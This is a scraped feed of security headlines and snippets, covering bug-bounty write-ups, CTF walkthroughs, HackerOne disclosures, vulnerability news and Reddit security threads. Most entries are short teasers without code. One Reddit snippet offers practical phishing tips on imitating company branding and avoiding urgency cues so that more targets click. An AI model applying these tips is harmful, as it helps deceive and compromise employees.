    Hello everyone,  my name is Max. I’m a Computer Science student and ethical hacker from Germany. Today I want to tell you how I hacked the… Continue reading on Medium »
    Denial of Service through …
    Today let us learn about Denial of service Continue reading on Medium »
    A Guide For Advanced Message Protected API Hacking Using Hackvertor and Burp (part 2)
    More up-to-date Hackvertor game-changer techniques, code examples, and tips for advanced API penetration testing and bug bounty. Continue reading on Medium »
    Open Redirect Vulnerability
    We’ll begin our discussion with open redirect vulnerabilities, which occur when a target visits a website and that website sends their… Continue reading on Medium »
    NahamCon CTF 2022 — Web Exploitation — All Challenges — Writeup
    Flaskmetal Alchemist ( Medium) Continue reading on Medium »
  • Open

    Apple Silicon Exclusively Hit with World-First “Augury” DMP Vulnerability
    Article URL: https://www.tomshardware.com/news/apple-silicon-exclusively-hit-with-world-first-augury-dmp-vulnerability Comments URL: https://news.ycombinator.com/item?id=31252031 Points: 2 # Comments: 0
    Responsible Disclosure: 6000 Vulnerability Submissions Later
    Article URL: https://www.danielmakelley.com/responsible-disclosure-6-000-vulnerability-submissions/ Comments URL: https://news.ycombinator.com/item?id=31251551 Points: 3 # Comments: 0
    Vuls: Agent-less vulnerability scanner for Linux, FreeBSD
    Article URL: https://github.com/future-architect/vuls Comments URL: https://news.ycombinator.com/item?id=31250171 Points: 18 # Comments: 1
  • Open

    SecWiki News 2022-05-03 Review
    How to write a research paper? by ourren. For more of the latest articles, visit SecWiki
  • Open

    The ABCs of Kerberoasting
    Introduction Continue reading on InfoSec Write-ups »
    Shibboleth from HackTheBox — Detailed Walkthrough
    No content preview
    THM Writeup: Ra
    No content preview
  • Open

    WooCommerce Credit Card Skimmers Concealed In Fake Images
    Our research and remediation teams have noticed an increase in WooCommerce credit card skimmers on client sites over the past few years, as detailed in past blog posts. Due to the increased number of plugins and components facilitating online payments and its ease of use, WordPress has become a common e-commerce platform — and the frequency in which the popular CMS is being targeted by attackers aiming to steal sensitive personal information and credit card details is also accelerating. Continue reading WooCommerce Credit Card Skimmers Concealed In Fake Images at Sucuri Blog.
  • Open

    Session-based testing made easy with ZAP HTTP Sessions
    ZAP has a feature called HTTP Sessions. Going by the name and the contents of its options, I had only assumed it was a session-handling feature and had never actually used it. Today, while browsing the menus to see whether there was a feature I had missed, I found it and tested it; it looks like something that can reduce the inconvenience of testing more than I expected, so I'd like to introduce it in a post :D HTTP Sessions: HTTP Sessions is, as the name suggests, a feature in which ZAP automatically recognizes the Session used in HTTP and makes it available to other actions. Explaining it in words alone won't give you much of a feel for it, so let's look at how it is used in the following order.
  • Open

    Blind XSS via Feedback form.
    Judge.me disclosed a bug submitted by b3hlull: https://hackerone.com/reports/1339034 - Bounty: $1250
    Self-DoS due to template injection via email field in password reset form on access.acronis.com
    Acronis disclosed a bug submitted by sudo_bash: https://hackerone.com/reports/1265344
  • Open

    How to conduct VAPT?
    How to conduct a VAPT? Continue reading on Medium »

  • Open

    HTB[CTF]: Lame [Easy]
    Let's start our CTF by performing reconnaissance of the environment we are going to face… We'll begin with the port scan: Continue reading on Medium »
    HTB[CTF]: Pennyworth [Easy]
    Let's start by running a basic port scan on our target; I will use nmap for that. Continue reading on Medium »
    Fun with DLL’s — Part 1 — DLL Search Order Hijacking
    This post is part of a new series I’m starting titled “Fun with DLL’s” where I will dive into the specifics of Windows DLLs. In this… Continue reading on Medium »
    Red Team Powershell Scripts
    Various PowerShell scripts that may be useful during red team exercise Continue reading on Medium »
  • Open

    My iPhone is making calls to kozow.com
    Should I be worried? From my research it is a c2 of some malware. Any advice or check? submitted by /u/punto2019 [link] [comments]
    Is there a simple way to easily verify which download link on a site ( with multiple 'download buttons' ) is the correct one ?
    Cheers! submitted by /u/Unusual-Resolve-7521 [link] [comments]
  • Open

    Passed my GSEC!
    Passed my GSEC with an 84 today, not as high as I was hoping but comfortably in the middle. Overall I am happy with the experience! My job gets vouchers for SANS every year so which course should I pursue next if I can get a voucher? For context I work Cyber Threat Analysis and Passive/Active Network Analysis. Currently have GNFA as my only other cert. submitted by /u/Johnsonwilliam977 [link] [comments]
  • Open

    UNC3524: Eye Spy on Your Email
    submitted by /u/mattjayy [link] [comments]
    How masscan works
    submitted by /u/rushter_ [link] [comments]
    Augury Augury: Using Data Memory-Dependent Prefetchers to Leak Data at Rest (on Apple M1 and similar)
    submitted by /u/nicuramar [link] [comments]
    AWS Targeted by a Package Backfill Attack
    submitted by /u/viagas472 [link] [comments]
  • Open

    He110 W0r1d
    My dear digital natives, developer, hackers and programmers… It’s nice to meet everyone of you! Continue reading on Medium »
    War in Ukraine / May 1
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    NahamCon Capture The Flag 2022 [Indonesian Version]
    Note that this Write Up only focuses on the challenges in the Open Source Intelligence (OSINT) category of NahamCon CTF 2022 Continue reading on Medium »
    Making an untraceable smartphone…
    Let’s talk about… anonymity. Today we will talk about the security of our mobile phones. Let’s start with hardware… Continue reading on Medium »
  • Open

    North Korean books and pictures, my guess is that it's run by some Jucheist in the west trying to share around DPRK propaganda, interesting to look through and might be helpful if you're curious about reading books from NK and don't know where to look
    submitted by /u/subwaytech [link] [comments]
    Some Games
    http://ashamanecore.com/dicpics/Games/ submitted by /u/Madman3001 [link] [comments]
    A Google drive folder with movies, books, audiobooks and shows
    [ Removed by reddit in response to a copyright notice. ] submitted by /u/EpikDuckiee [link] [comments]
    a bunch of files about military boats (mostly pictures)
    submitted by /u/subwaytech [link] [comments]
  • Open

    SecWiki News 2022-05-02 Review
    SecWiki Weekly (Issue 426) by ourren. Python Cookbook, 3rd edition, Chinese version by ourren. For more of the latest articles, visit SecWiki
  • Open

    Reflected XSS Vulnerability leads to Credential Stealing worth $100
    Hi! This is Rian with my very first bug bounty write-up. Continue reading on Medium »
    A Bug Bounty Hunter’s Guide to IDOR Vulnerabilities
    How to find, exploit, and prevent insecure direct object references Continue reading on Medium »
  • Open

    Breakout from the Seccomp Unconfined Container
    submitted by /u/tbhaxor [link] [comments]
    Advanced Persistent Threat (APT) Malware Samples and Research Papers Collection
    submitted by /u/cybersocdm [link] [comments]
  • Open

    g_CiOptions in a Virtualized World
    With the leaking of code signing certificates and exploits for vulnerable drivers becoming common occurrences, adversaries are adopting the kernel as their new playground. And with Microsoft making technologies like Virtualization Based Security (VBS) and Hypervisor Code Integrity (HVCI) available, I wanted to take some time to understand just how vulnerable endpoints are when faced... The post g_CiOptions in a Virtualized World appeared first on TrustedSec.
  • Open

    BPF Advanced Notes (4): Debugging BPF Programs
    These are notes I took while reading some advanced BPF tutorials. About the "BPF Advanced Notes" series: compiled while studying and using BPF day to day. Since these are notes rather than a tutorial, the content does not aim to be continuous; readers with a basic foundation can use them to fill gaps. Unless otherwise stated, the code in this article is based on kernel version 5.10. BPF Advanced Notes (1): BPF program (BPF Prog) types explained: use cases, function signatures, execution points and program examples. BPF Advanced Notes (2): BPF Map types explained: use cases, program examples. BPF Advanced Notes (3): BPF Map kernel implementation. BPF Advanced Notes (4): Debugging BPF programs. About the "BPF Advanced Notes" series 1 Printing logs 1.1 Log path and format 1.2 bpf_printk(): kernel 5.2+ Usage; Limitations; Kernel implementation 1.3 bpf_trace_printk() Usage; Limitations; Kernel implementation 2 Tracing one BPF program with another BPF program (BPF trampoline) 2.1 Use cases 2.2 Dependency: kernel 5.5+ 3 Setting breakpoints and single-step debugging 3.1 bpf_dbg (cBPF only) 1 Printing logs 1.1 Log path and format The several logging methods introduced in this section all ultimately write to the debugfs path /sys/kernel/debug/tracing/trace: $ sudo tail /sys/kernel/debug/tracing/trace # field descriptions - telnet-470 [001] .N.. 419421.045894: 0x000…

  • Open

    (XSS) Account takeover using Steam
    This story begins a couple of years ago. I was navigating through a gambling website (which I cannot disclose) when I decided I would… Continue reading on Medium »
    Exploiting IRCTC along with few other government domains through XXE
    In this blog I would be giving an Insight about XXE(XML External Entity) injection and a practical attack case study where I did… Continue reading on System Weakness »
    Exploiting IRCTC along with few other government domains through XXE
    In this blog I would be giving an Insight about XXE(XML External Entity) injection and a practical attack case study where I did… Continue reading on Medium »
    AlbusSec:- Penetration-List 06 SQL Injection (SQLi) — Part 2
    Hello Cybersecurity folk, I hope that you liked the previous article, so here you’ll learn about basic things about SQLi, Today’s article… Continue reading on Medium »
    Active VS Passive Reconnaissance
    Just like many other cybersecurity terms, “Reconnaissance” also derives from the military jargon. Continue reading on Bug Zero »
  • Open

    Putin signs presidential decree: IT security departments to be set up immediately, information security equipment from unfriendly countries banned
    The current Russian president, Putin, has formally signed a presidential decree on additional measures to ensure Russia's information security, ordering all Russian ministries, agencies and key organizations to establish IT security departments.
  • Open

    XSS at http://nextapps.mtnonline.com/search/suggest/q/{xss payload}
    MTN Group disclosed a bug submitted by homosec: https://hackerone.com/reports/1244722
    XSS at videostore.mtnonline.com/GL/*.aspx via all parameters
    MTN Group disclosed a bug submitted by homosec: https://hackerone.com/reports/1244731
    Enumerate class codes via yahoo dork - Can access any course under teacher - Sensitive information leaked
    Khan Academy disclosed a bug submitted by bughunterpol: https://hackerone.com/reports/1514356
  • Open

    Feedback Welcome
    Phishing Tips Avoid the classics Urgent Problem to fix (unpaid invoice, hotel bill, acct. compromise). Making the request too important or urgent raises suspicion and decreases the odds of user compliance since these tactics are hammered in modern Security Awareness training (yes, people will still click, but not as many). Embrace Subtlety and Play Hard to Get Signature format, company fonts, colors, match everything up to build trust levels E-mail HR or someone else from company with a normal question, wait for their reply, then collect above items Emotions without Urgency Normalcy and trust must be intertwined with the emotion you choose to target (RARELY make specific requests in the message body, remember that if they're interested they're going to cli…
    Linux Privilege Escalation (Series)
    submitted by /u/tbhaxor [link] [comments]
  • Open

    War in Ukraine / April 30
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Online Tools For OSINT
    A collection of several hundred online tools for OSINT Continue reading on Medium »
    MAC-address OSINT
    I propose to study the sources intended for the study of the MAC address. MAC or Media Access Control is a unique combination of numbers… Continue reading on Medium »
    SPY NEWS: Week 17
    Summary of the espionage-related news stories for the Week 17 (24–30 April) of 2022. Continue reading on Medium »
  • Open

    Is it wrong for GitHub to host hacking tools?
    The culture of most mainstream cyber sec forums / portals is "do no harm". Most forum members will thankfully not co-operate if they suspect their advice will be used for nefarious purposes. However, this culture of keeping things clean is slightly subverted by GitHub who seem to have some very potent hacking tools on their site. Yet, I rarely hear the media or other internet commentators lambast them in the same way that Walmart gets criticised for selling arms. Any thoughts on this? submitted by /u/astillero [link] [comments]
  • Open

    SecWiki News 2022-05-01 Review
    No news updated yet today~ For more of the latest articles, visit SecWiki
  • Open

    [Cullinan #33] Add PP/IDOR/Type Juggling and SAML Injection 🪁
    This is Cullinan log #33. I have newly added the Prototype Pollution, IDOR, Type Juggling and SAML Injection entries, and added an SSRF Chains section to SSRF. New: Prototype Pollution, IDOR, Type Juggling, SAML Injection. Update: Blind SSRF, Canaries in SSRF. As an aside, not long after I wrote up and posted Prototype Pollution, the Intigriti XSS Challenge 0422 came out with Prototype Pollution as its core topic, so I remember having to struggle less because of it! The timing was really good :D
  • Open

    Vulnerabilities that shook the internet
    Introduction Continue reading on InfoSec Write-ups »
    NahamCon CTF 2022 Write-up: Click Me! Android challenge
    No content preview
    TryHackMe — Content Discovery
    No content preview
  • Open

    Ethical Hacking and other stuff
    I found this open directory. It contains tons of books and material related to ethical hacking. I am not sure about the quality of content, would like someone experienced in this field to comment on it. Tagging as NSFW as I haven't gone through all dirs. https://lira.epac.to/DOCS-TECH/Hacking/ submitted by /u/grvsood [link] [comments]
  • Open

    Rails – XSS Vulnerability in Action View
    Article URL: https://discuss.rubyonrails.org/t/cve-2022-27777-possible-xss-vulnerability-in-action-view-tag-helpers/80534 Comments URL: https://news.ycombinator.com/item?id=31224906 Points: 1 # Comments: 1
    Reflected XSS Vulnerability Found in WordPress Anti-Malware Firewall
    Article URL: https://www.searchenginejournal.com/vulnerability-found-in-wordpress-anti-malware-firewall/448101/ Comments URL: https://news.ycombinator.com/item?id=31223394 Points: 1 # Comments: 0
  • Open

    iPhone Password cracking possible with ??
    Hi community … heard about Grayshift tool for conducting iOS forensics investigation …. Wanted to know how’s that tool able to crack the passcode or on the latest versions of iOS like 15.3 … how’s it able to recover most of data by breaking the code Any insights on this or on iOS forensics on latest versions would help .. Thanks submitted by /u/Aromatic_Ideal_2933 [link] [comments]
  • Open

    Changes In The Use Of LNK Files
    Not long ago, I posted regarding how LNK files can be (ab)used; the post refers to LNK file metadata, and how, if the LNK file is sent by the threat actor, that metadata can be used to learn about the threat actor's environment. I first saw this mentioned by JPCERT in 2016, where they included an interesting graph (figure 1) in their post to illustrate the point. Tony Lambert recently shared via his blog a change in Emotet TTPs, that the threat actor group had moved to using LNK files as an initial delivery mechanism. In the post, Tony described this as "a really interesting TTP change", and that it was "odd but not unexpected". Tony also shared a link to download a copy of the LNK file, as well as metadata parsed from the LNK sample via EXIFTool. I don't often use EXIFTool for this sort …
  • Open

    As an ethical hacker, network scanning techniques, also known as path tracing, can assist you in learning about a network’s logical configuration.
    submitted by /u/RaccoonCivil5453 [link] [comments]
    Analysis of phishing kill chain identifies emerging technique that exploits trust in your collaboration platforms
    submitted by /u/boybeaid [link] [comments]

  • Open

    Best OS for exploit development against Windows
    What is the best OS to develop windows exploits? Currently using Kali with VMware workstation. What does everyone else use? submitted by /u/FutureMasterRoshi [link] [comments]
  • Open

    Weird or looks like malicious behaviors but are actually normal
    What are the weird system or network behaviors that you think are weird and should be alerted on but actually are very common? Let me get started. Splunk and Nessus both love using long B64 PowerShell encoded commands to do stuff. Lots of legit stuff running whoami as SYSTEM. submitted by /u/Calm_Scene [link] [comments]
    What tech should I be learning?
    I’ve been in IT for over 10 years. Jack of all trades, master of none. I’ve got experience with Linux, Windows, network engineering, and security. Several SANS certs. Vendor certs expired years ago. Trying to move more towards security. Currently learning more about SIEM and detection with Wazuh. One thing I’m lacking is any programming or even scripting skills. About to learn Python. PowerShell is also on the list. Other security interests include the following: 1. Compliance 2. Prevention 3. Detection. Any technologies I should be looking into? Any topics I should read up on? Thanks! submitted by /u/damienhull [link] [comments]
  • Open

    War in Ukraine / April 29
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Maltego for the poor or what are the free add-ons for it
    A long time ago I decided to write an article about making work with Maltego cheaper. The product is definitely great. But very expensive… Continue reading on Medium »
    Services for detecting deepfakes
    Fake Profile Detector (Deepfake, GAN) — this AI model only works on StyleGAN images used to create fake human faces of people that don’t… Continue reading on Medium »
  • Open

    SecWiki News 2022-04-30 Review
    A review of 0-day vulnerabilities exploited in the wild in 2021 by ourren. Smarty template injection and sandbox escape by ourren. Fun MISC by ourren. For more of the latest articles, visit SecWiki
  • Open

    SAML Injection
    🔍 Introduction SAML Injection refers to injection attacks that can occur in Security Assertion Markup Language (SAML). In the SAML process, attack code inside the XML syntax can be used to bypass authentication steps such as SSO or to pass Signature verification. 🗡 Offensive techniques Detect Every place where SAML is used, such as SAML-based SSO, is subject to inspection. Basically, you check whether Signature verification is performed, and you can check by adding or modifying values in the SAML Response/Assertion message, for example with an XSW (XML Signature Wrapping) Attack, and observing how the server reacts.
    Type Juggling (Loose Comparison Bug)
    🔍 Introduction Type Juggling refers to a vulnerability where, depending on the Loose/Strict Comparison used when comparing several variables, an if statement or similar can be passed with a value the developer did not intend. PHP is generally known to be affected. It is commonly known as PHP type juggling or the Magic hashes attack.
    Comparison | Equal | Not Equal | Description
    Loose      | ==    | !=        | the same value
    Strict     | ===   | !==       | the same type and the same value
    🗡 Offensive techniques Detect In PHP code, == or !
    IDOR (Insecure Direct Object Reference)
    🔍 Introduction IDOR (Insecure Direct Object References) is an Access Control vulnerability in which externally exposed or user-supplied input references and accesses an Object directly, which can be used to perform actions beyond one's own privileges. Origin Request: GET /info?accountId=15442 IDOR Request: GET /info?accountId=1110 Generally this is Horizontal privilege escalation, that is, abusing privileges horizontally, but depending on the application's configuration or policy it can sometimes lead to Vertical privilege escalation. 🗡 Offensive techniques Detect Every place in the application's processing logic where a user input value is referenced directly by an Object is affected.
  • Open

    Sensitive Data Exfiltration through XSS ($450)
    The story of my first bounty… Continue reading on Medium »
    Page Admin Disclosure when Posting a Reel
    Hello , I’m Syd from the Philippines. Today I would like to share one of my findings in Meta Bug Bounty Program. The bug that I found is… Continue reading on Medium »
    Bypassing File Upload Restriction using Magic Bytes
    Hello Hunters & Ninjas, Article is very late, for that accept my apology. Today I’m going to write about one of my finding in which an… Continue reading on Medium »
    Burp Suite Extension for AWS Signing
    AWSSigner Continue reading on Medium »
    ATO without any interaction [aws cognito misconfiguration]
    Hello friends, Continue reading on Medium »
  • Open

    com.nextcloud.client bypass the protection lock in Android app v3.18.1 latest version.
    Nextcloud disclosed a bug submitted by dashingjaved: https://hackerone.com/reports/1450368 - Bounty: $200
  • Open

    RW-Fuzzer: A Fuzzing Method for Vulnerability Mining on Router Web Interface
    submitted by /u/paran0ide [link] [comments]
  • Open

    Music/Games (pretty slow)
    https://www.7xr.nl submitted by /u/whopops [link] [comments]
  • Open

    HELP !! with Volatility
    Every time I run a command using Volatility I get the following output: Volatility Foundation Volatility Framework 2.6 INFO : volatility.debug : Determining profile based on KDBG search... No suitable address space mapping found Tried to open image as: MachOAddressSpace: mac: need base LimeAddressSpace: lime: need base WindowsHiberFileSpace32: No base Address Space WindowsCrashDumpSpace64BitMap: No base Address Space WindowsCrashDumpSpace64: No base Address Space HPAKAddressSpace: No base Address Space VirtualBoxCoreDumpElf64: No base Address Space VMWareMetaAddressSpace: No base Address Space QemuCoreDumpElf: No base Address Space VMWareAddressSpace: No base Address Space WindowsCrashDumpSpace32: No base Address Space Win10AMD64PagedMemory: No base Address Space WindowsAMD64PagedMemory: No base Address Space LinuxAMD64PagedMemory: No base Address Space AMD64PagedMemory: No base Address Space IA32PagedMemoryPae: No base Address Space IA32PagedMemory: No base Address Space OSXPmemELF: No base Address Space FileAddressSpace: Location is not of file scheme ArmAddressSpace: No base Address Space Any help is more than welcome. Thank you!! submitted by /u/maxoberto [link] [comments]

  • Open

    Root Cause Analysis
    One of the challenges within DFIR, particularly as we've moved to an enterprise approach by leveraging EDR telemetry, is the root cause analysis, or "RCA". In short, the challenge is observing malicious activity and determining the root cause; the challenge itself stems from the fact that EDR telemetry is only partial visibility, or that correlating observed malicious activity with causal data not evident or available via EDR telemetry requires additional context, and by extension, additional effort/expenditure of resources. It also requires an additional "leveling up" of skillsets.  Yes, many organizations that deploy EDR tooling also include a means for extracting additional files/data from the endpoint, and what to collect isn't usually in question. Rather, how to truly exploit the coll…
  • Open

    Lots of different stuff, including north korean electronic music
    submitted by /u/omnifage [link] [comments]
    Collection of PDF books about HTML, CSS, JavaScript, Python and others
    http://198.74.52.119/ submitted by /u/senpie95 [link] [comments]
  • Open

    Bug Bounty Operating Principles
    Experiences from a number of programs, and trying to be fair, generous, and grateful to security researchers. Continue reading on Medium »
    How was I able to find my first bug in a real website?
    It was the days of August 2020 when I used to try to find XSS (Cross-Site Scripting) vulnerability because of the curiosity that I… Continue reading on Medium »
    OTP Bypass + PATO = 100 Dollars Bounty
    Hello ppl! This is Gnana Aravind here with another awesome write-up explaining the story of my recent bounty. Continue reading on Medium »
    New Vault in Hats.Finance
    We are excited to onboard Temple DAO to the Hats bug bounty program! They have decided to open their bug bounty vault with 450,000 $TEMPLE… Continue reading on Medium »
    Introduction to Smart Contract why it is so demanding in the IT world…
    Started my research a month ago into Smart Contracts as a Security Analyst of Avalance Global Solutions and that’s why I want to share my… Continue reading on Medium »
  • Open

    Hackthebox: Infiltration
    Lab: OSINT Continue reading on Medium »
    War in Ukraine / April 28
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Social pages monitoring
    I propose to discuss today such an issue as the organization of monitoring the social pages of employees. Otherwise, there is a great risk… Continue reading on Medium »
    Media monitoring in OSINT
    Today we will talk about monitoring mentions in the media using free sources: Continue reading on Medium »
    OSINT: It’s just Googling
    Olympic sprinting: It’s just moving your legs dead fast. Continue reading on Medium »
  • Open

    Reverse Engineering PsExec for fun and knowledge
    submitted by /u/CyberMasterV [link] [comments]
    MacOS Forensics/ SANS FOR518
    Hey y'all, TL;DR: I'm new to macOS forensics and need to purchase a Mac for SANS FOR518, but I'm confused about the hardware requirements. Is virtualisation on a Mac essential if I already have a Windows workstation? Could I get through the course/real-world forensics with an M1 Mac? I'm looking at enrolling in the SANS FOR518 Mac Forensics course online and it states that an Intel Mac is required.
    1) Is an Intel Mac a critical requirement in real-world forensics, or will an M1 Mac be a better investment in the long term (performance, futureproofing)? I have a Windows machine to run Windows/Linux VMs.
    2) What virtualisation is required during the FOR518 course? Is it to run Windows/Linux tools or to virtualise a suspect image?
    3) MacBook Air or MacBook Pro? Does the MacBook Pro offer any significant benefits over the MacBook Air for the forensic use case? I'm looking at the base 8GB model, maybe 16GB if I absolutely need it.
    Appreciate any advice! submitted by /u/hiddenbytes [link] [comments]
    DoD Contracting Digital Forensics
    Greetings, Anyone have any experience doing digital forensics contracting for the DoD? A recruiter from Akima reached out to me for a contracted position for a federal agency doing exactly what I do now (digital forensics for law enforcement). The pay is nearly double and nets me a Top Security clearance (I previously held Public Trust). I would be crazy not to make the jump, right? submitted by /u/BlockchainForensics [link] [comments]
    Current free training?
    I know there was some posts about this a while ago, but nothing current. Anyone know of any free trainings related to computer/phone forensics? submitted by /u/foxcop91 [link] [comments]
  • Open

    Reflected XSS due to vulnerable version of sockjs
    Automattic disclosed a bug submitted by chip_sec: https://hackerone.com/reports/1100326 - Bounty: $250
    Hardcoded AWS credentials in .msi
    8x8 disclosed a bug submitted by chip_sec: https://hackerone.com/reports/1368690
    Reflected XSS []
    U.S. Dept Of Defense disclosed a bug submitted by fdeleite: https://hackerone.com/reports/1309385
    Reflected XSS []
    U.S. Dept Of Defense disclosed a bug submitted by fdeleite: https://hackerone.com/reports/1309237
    lfi in filePathDownload parameter via
    U.S. Dept Of Defense disclosed a bug submitted by exploitmsf: https://hackerone.com/reports/1542734
    Sensitive data exposure via /secure/QueryComponent!Default.jspa endpoint on
    U.S. Dept Of Defense disclosed a bug submitted by njmulsqb: https://hackerone.com/reports/1278977
    SSRF due to CVE-2021-27905 in www.
    U.S. Dept Of Defense disclosed a bug submitted by fdeleite: https://hackerone.com/reports/1183472
    vulnerable to CVE-2022-22954
    U.S. Dept Of Defense disclosed a bug submitted by null_bytes: https://hackerone.com/reports/1537543
    Blind SQL Injection
    U.S. Dept Of Defense disclosed a bug submitted by mido0x0x: https://hackerone.com/reports/771215
    SQL INJECTION in https:///
    U.S. Dept Of Defense disclosed a bug submitted by mido0x0x: https://hackerone.com/reports/723044
    Possibility to force an admin to install recommended applications
    Nextcloud disclosed a bug submitted by igorpyan: https://hackerone.com/reports/1403614 - Bounty: $100
    OAUTH2 bearer not-checked for connection re-use
    Internet Bug Bounty disclosed a bug submitted by monnerat: https://hackerone.com/reports/1552110 - Bounty: $2400
    CVE-2022-22576: OAUTH2 bearer bypass in connection re-use
    curl disclosed a bug submitted by monnerat: https://hackerone.com/reports/1526328
    DoS via large console messages
    Mattermost disclosed a bug submitted by thesecuritydev: https://hackerone.com/reports/1243724 - Bounty: $150
    CVE-2022-27776: Auth/cookie leak on redirect
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1551591 - Bounty: $480
    CVE-2022-27775: Bad local IPv6 connection reuse
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1551588 - Bounty: $480
    CVE-2022-27774: Credential leak on redirect
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1551586 - Bounty: $2400
  • Open

    SecWiki News 2022-04-29 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Introducing MutableSecurity: Seamless deployment and management of security solutions
    submitted by /u/iosifache [link] [comments]
    Be aware of this trick: Python module hijacking leading to code execution
    submitted by /u/slashtmp00 [link] [comments]
  • Open

    Best Nessus parser that works with v10 for free/cheap?
    We currently use Nessus Pro for vulnerability scanning. However the output reports it generates are not very helpful, often there can be 10 or 20 lines in the output CSV that refers to the same vulnerability on the same computer, whereas what we need is an actual actionable report that says these PCs have this vulnerability which you fix with this patch, or something similar. I found this article https://www.sans.org/blog/data-data-everywhere-what-to-do-with-volumes-of-nessus-output/ however it is from 2014 and the parser it links to is from 2017 and seems to require a Linux installation with Perl, we are a Windows organisation. Is there an up to date piece of software which does this kind of thing either free or low cost and runs on Windows? We can't afford Tenable.io for our entire workstation estate, this is why we have Nessus instead. submitted by /u/danj2k [link] [comments]
    Are SOC roles notoriously slow?
    Got my first tier 1 SOC role for a small company (2k employees). My training was: watch vSphere and contact the virtualization admin if anything goes over 90% usage for more than 10 mins. Watch LogRhythm; the baseline is 5k logs. Report if it goes over for an extended period of time. Answer SolarWinds alarms. Report if it's not a false positive. That's it. That's what I do all day every day for 63k a year. How does this translate into a higher role? "Yeah I'm good at staring at a dashboard all day." Why can't they just tack this on as an additional responsibility to help desk or the sysadmin? I dread the day the company realizes they're wasting 60k * 6 employees to operate a 24/7 SOC when all we do is watch Netflix all day, and then they lay us off and I didn't even get any transferable skills to help get me a replacement job. Regarding certs, I've received a lot of bad feedback on certs. No job interview has ever even asked about my certs. People always flame and say "why would I hire a cert chaser?" because I have a bunch already. All CompTIA, which I know doesn't compare to something like CISSP, but certs have just left a bad taste in my mouth. I have A+, Net+, Sec+, CySA+, PenTest+ and AZ-900. submitted by /u/guywithaquestchin [link] [comments]
    Shodan vs Criminal IP
    I mentioned a search engine and a product called Criminal IP a while ago! I think the page is open now, and I'm using one feature or another. I saw a post posted by a developer on the OSINT channel about Criminal IP, but I'm still a beginner, so I don't understand what they mean. But what I can see exactly is that it looks quite similar to Shodan. Which do you think is more valuable in terms of studying security, Shodan or Criminal IP? Below are the link to the developer's post and the related post I posted a while ago. https://www.reddit.com/r/OSINT/comments/ucyo2c/we_made_a_new_osint_tool_criminalipio_i_would/ https://www.reddit.com/r/netsecstudents/comments/uct4pn/search_engine_preregistration_criminal_ip/ submitted by /u/Alexiosplana [link] [comments]
    Security Architecture study recommendations
    Hi, I am hoping to get some advice on which particular study/certification would be best suited to improving and consolidating my current experience. First a bit of background. I’ve been working in IT since 2004 and moved into network security in 2007. I’ve always worked for service providers who provided network security consultancy and expertise so I have about 15 years experience mostly in implementation of firewalls, web proxies, load balancers, IPS, AAA, VPN, some virtualisation, that kind of stuff. I’ve worked in some of the largest and most well known companies providing mostly deployment capabilities in these types of technologies for customers mostly in banking and telco industries. I would say about 85% deployment and 15% design. A large portion of the deployment work however w…

    Trello From the Other Side: Tracking APT29 Phishing Campaigns
    submitted by /u/dmchell [link] [comments]
    Cybersecurity conferences
    Hi guys! Does anybody know what are the most interesting hacking and cybersecurity conferences in Europe? submitted by /u/Derrick_Wallarm [link] [comments]

    Red Teaming Toolkit
    This repository contains cutting-edge open-source security tools (OST) that will help you during adversary simulation and as information… Continue reading on Medium »

    Session forgery in Flask
    Preface: This article discusses session forgery in the context of CTF challenges I have encountered. Many others have already written about it, and written very well, but I still want to record it myself so I can review it later. CISCN had a session forgery challenge, which I had not done before
    French medical software company fined 1.5 million euros for leaking data of 490,000 patients
    Recently, the French regulator CNIL (Commission Nationale de l'Informatique et des Libertés) fined medical software vendor Dedalus Biology 1.5 million euros.
    China Mobile sending strange text messages? It reminded me of the telecom industry's nuclear-grade vulnerability
    Interestingly, although this vulnerability has existed for a long time, attackers have kept exploiting it. Today let's talk again about this remarkable SS7 vulnerability.
    NSA Network Infrastructure Security Guidance (translation) (part 3)
    This report presents best practices for overall network security and the protection of network devices, helping administrators prevent adversaries from exploiting their networks. The guidance is general and applies to many types of network devices.
    Vulnerability analysis: stack overflow (CVE-2006-3439)
    This vulnerability, disclosed by Microsoft in 2006, is a remote code execution flaw caused by a stack overflow in the Server service.
    From 0 to 1: how to do monitoring well in security operations? | FreeBuf enterprise community livestream recap
    Cybersecurity operations is about how to find shortcomings, analyze root causes, resolve them, and prevent incidents from recurring.
    FreeBuf enterprise group discussion | Talking about enterprise attack-and-defense exercises
    Should today's attack-and-defense exercises be run routinely to take stock of security? What changes or effects does remote work under pandemic conditions have on such exercises?
    Attackers hijack large numbers of WordPress sites to launch DDoS attacks on Ukraine
    Attackers are conducting DDoS (distributed denial of service) attacks on pro-Ukraine websites and government portals.
    FreeBuf weekly | Beijing Health Kit hit by overseas cyberattack; Coca-Cola confirms cyberattack and opens investigation
    Gartner says security and risk management leaders must address seven major trends to protect their organizations' ever-expanding digital footprint from new threats.
    Talk preview | Exploring approaches to applying zero trust architecture in financial enterprises
    Follow the experts, starting from the practical requirements of zero trust, from concept to practice, to raise every security practitioner's understanding of zero trust architecture.
    Microsoft fixes ExtraReplica Azure vulnerabilities that exposed user databases
    These vulnerabilities could let a malicious user bypass authentication, escalate privileges, and gain access to other customers' databases.
    Study finds ransom payments account for only 15% of total losses from ransomware incidents
    Victims' financial outlay for incident response, system recovery, legal fees, monitoring costs, and the overall impact of business disruption far exceeds the ransom amount.
    Official notice: Beijing Health Kit hit by overseas cyberattack
    On April 28, Beijing Health Kit was hit by a cyberattack during peak usage; preliminary analysis indicates the attack originated from abroad.
    Spring Framework: a breakdown analysis of CVE-2022-22965
    After reading about the environment setup and details of CVE-2022-22965 online, I felt that some background knowledge is essential to understand the vulnerability, so I wrote up the whole process in detail, from analyzing the Spring Framework structure and setting up the environment to analyzing and debugging the vulnerability.

    ExtraReplica – a cross-account database vulnerability in Azure PostgreSQL
    Article URL: https://www.wiz.io/blog/wiz-research-discovers-extrareplica-cross-account-database-vulnerability-in-azure-postgresql/ Comments URL: https://news.ycombinator.com/item?id=31203059 Points: 1 # Comments: 0
    Passing Time Syncing Secrets:Demonstrating Covert Channel Vulnerability in PTP
